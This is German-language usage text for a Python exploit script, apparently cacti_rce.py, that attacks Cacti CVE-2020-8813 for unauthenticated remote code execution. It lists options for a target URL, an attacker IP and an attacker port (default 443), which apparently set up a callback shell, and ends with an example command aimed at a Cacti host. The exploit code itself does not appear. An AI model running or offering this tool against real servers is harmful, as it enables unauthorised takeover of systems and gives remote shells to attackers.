
Python-Exploit-Skript, das Cacti CVE-2020-8813 für nicht authentifizierte Remote-Code-Ausführung über manipulierte HTTP-Anfragen angreift.
Verwendung: cacti_rce.py [Optionen]
Optionen:
-h, --help zeigt diese Hilfemeldung an und beendet
-u URL, --url=URL [ Erforderlich ] Ziel-URL z.B.: http://Cacti/
-l LHOST, --lhost=LHOST
[ Erforderlich ] Angreifer-IP-Adresse
-p LPORT, --lport=LPORT
[ Standard 443 ] Angreifer-IP-Port
python3 cacti_rce.py -u http://CACTI/ -l 192.168.x.x